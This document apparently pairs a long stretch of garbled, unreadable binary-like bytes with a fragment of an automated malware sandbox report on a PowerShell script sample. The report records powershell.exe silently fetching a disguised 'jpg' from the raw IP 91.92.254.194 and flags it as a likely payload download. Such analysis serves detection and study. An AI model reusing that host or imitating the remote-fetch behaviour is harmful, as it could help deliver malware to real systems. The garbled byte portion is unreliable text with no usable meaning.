ãUîqÆÏ¥ÖûSû3Òøi4J&\|gÆ¾Ïk<vhØx5«"%¨$ûk2>ÑýÑøöDa5t8U¨ãú64h{ºÿ<ÒûYö_SöwÄ'F1_¥«®cè.¦"MÀþ¸³Ã½Z´ äã¹ÛY©¤íUó/M¬=<¯æ f¤pèy9èühôzC¯ÔÍm¶¶ÃÒ·ÄàAöqÝwêdØ:^¿<\|7Á£;^T¾ËÏóÏ?«ñæÖ»¨T~W¾'÷úXÿç±üC:§¯Å[pÏøÏO¡×Oæ ÈdjeéÔæìzÔÃÇ©UaÝ\ø¤^,Ú½4îfæäê×çåÑ<ÇÛt:±öÎD³J)Pa%U×s¾ÓÈàOóRG6!Øîÿdußm sd7Ðgêp)@®ðßØG×S¯xÈfô«\|3îbûàAÊOAß.xí"7#]²2ÄquÕêcÑédF ¥@VÄ?l~u+ÆÖ"[añ9òÑ§bóÓý ×'xî«Vò)ó$$k¡Øb(ÚI¬Ó¡¾ëf¦s!LôKâ ¦R8eu æN¸éÒêh¿æ_^äk$ú!n8}s+jÕltÅK0p4¼E'øPF¥0géß³~ø6Zm¤µ ³ÏôÏ~Ê~Ç¸aâzÅµ>5[l!vUð;F q!´¬£Ò7³\øæ6¹Ó`òØ01S¡Mî=@øcÈ: ÀÄu0²,xa³}äoÛíï;\|eÁH.¡¨ÔªnÜvó~Vpé,}DH?3sn¯Å¶¨»¾¶'?ÍJÄ\|Vnã]ÌG;b]2C¡iLeSTËí²Éé<ÐäW_~2uú]lfi )cg)!y7(Gbð¬ñ¤o<s¾èÕ!MìZùä:ïU'K £, cµ¨å`»zv&þ¤X+§ÔxhÒéRy´ÈB¨u17»ÏÜ[x[æ?xZðl]<r¶)f%óo¢©ä °÷£ÔäxÉ©£Á)_5[nàªÑ.æ^Ts^Ùt 2iÞ£+:ïUvÚUUÔ)4`ôçºÙôiö¡ÄÕ¦0ËÅ±´{sxtñÜ~ìh¼°íìi\|ÝÖ?s_Ç1ö®÷Öø¡4K³éTi\)WV`"I~)k®sE T±ÛXIçh'·¶ë<9´¾" YfFR3µøím«Á_3¨:Y OM¦Ôêå%#PÚM¬HíÅÞ ü%Â£ÓJ%`ÊOHâY]_á`:uÖø>§G¡W+ÄÑ<KKµÅnye Üá&^§ÂCâ @4úÓ³AAT´LRñéY8ÜnÊÍ¢Óêµ_h'Ó¶cfhôç!fea´3 ôçæ:Ê%Õxv¥ÑâuEvVÝ¹°RW8,½Hã<Q3ZH3COLÀ4±EÚªXÉXÎî»Gýÿ¶mAâßwmZ8Hþ0+À¬¬Û¢bTúCaÛÞ³¤û7®}\.ñÓ½ëÃDÓ ¶6ê°¾#öbxåÍÔécñyguÊÐÄ¬ûHZÕë\|H<b8DE¦ÔÈúJ¢`P ^RAÿ ô ^¾¯Å~Î-(áA1FH%°:j¡4Æú°»Ï7?ÙýF@ÚæxkÌT9-L°°í×þÐò¶WÂ<oy"8c]\, Rz[ +]_ÜNU&_Õ8·<ué`Bg´ñÓ Å4K"jS<P²ÆJ+ÆXHÖ=6+bû}G\#ÊðíClÞtaKçkôý3KGösS¯K cÕXî¦vwEJPycè+,`fO¨]Tî=ÛcU4,åRtó¢ ¬qÇ^ÒA@ $voûcm4ÆeJ,+e¶ãé µõÀf¨°ù^F¥¯PYFÀ ªVûáX3ÂÛ¼¥±¸)½ÇÕUuClY%uk#sÁ&Èù`9§ÒåF/½ÂãÉ§Ú+£ wí¯áÞ!Ò®G.ª]Fua`GfU$©Ü¥lrÇðq=pÕèghuE¡tdWVÊÅX¤Ñµ?Ï¡WÂ[C©kÕjtð@ Èw7[Uº\|s>5h/Ê!C3XµøvçòÌÏ9Fâ(×7étóýÝ¦ xXµívÖ>®)Æ¥±ùw¬±VÜÛWÓÇadà_O©ÜÄ,AÊÝüFTI>ÝÂ(Ê]pN:Âé§ÔmP9ãß44¤"Ôo°¢ðñ\|{¹dT(æ+n [#Çõ:=jBEs;Ââ(¨V&¾N0]&§Ä%ML[f]ò1UV±Rh}AxßJ7X×Ï 3jÐC e`có^ãfHX,Ë¸}¬$í#Y4ÔÁéÞ3¿R¬kµc28<zuîÀ§&5]¢wxP f L¥µ¨^øIé®¤èÖ_Ü¤»B.ã [Ý´éÚì8º8¡QÛmQÃx´-áÚ¦ÒÏ$- TvÙ(eõ(`´l]u°+æNwí ÞÒ===úá×Ä!UdõÀ_éwrqÚðÍ4a\-.Öó8mCnRÊ·6FÇ$Ú2)Eõ9}<ávªÑH1öÔ'«R`/>Ì#Íñ`H\|Ç7R_Æ\Ê$VYõYLVWMEîdÚÃjóTp:¨¤HØ~,b2JË3G9£(·4X/âycU}°$NEdô9Ç® uÂDÛKÊ²ÓoÖ°$ÞpàIøç#¡# 04/Ü`wEYc!òÂvþyPÛOL/çÄëÚ²v»»]uÈÀYbÖÊÖËmxã.2«Ô÷À,jK8ðÀkK»2»¨UÌÇ ÀêZB}+ÒÎPÎéyäN£¨£m±÷È3³!<OÞv¨AQÛ8LÌ lZcÓBwÚTÑßyC,ÈÉ'úm9yoé+H aú©ã(ó¬º¦Í(ãé9%c@)_Îüµµ£òÃyòH«ûµk4 }B³®Ön@è{`-Ü±é¿d]Ç9í(ÄÏ:()çõ?dÅ+ ±ÓÖBÊm Ü¦»á¤&8A³`]sï(ÝÒVÅ©ºù5@4HULJ?_\õ<úpz%'jÞûx-^Q¥Ö²ÉîÞ[ÌU$µõ®Ùî5²XÞdVÍ[æT{÷Ï=âæÒx²êaÔÆ¤~å mx³ý/.]d¡SÂ«æ½ùÅhásq,A¯Í\|®qÉüQ&ñXõ'OJ?C?Ý¾ßûKlZÆ1ÌÎäðk¡¬È¦Ó¤D$T·!~5×«Ml³iß`Dfà

Poweshell is sending data to a remote host (1 event)

Data sent

GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

91.92.254.194

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send July 4, 2024, 9:51 a.m.	buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive socket: 1540 sent: 83	1	83	0

file_01ntx0mv.bfk.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All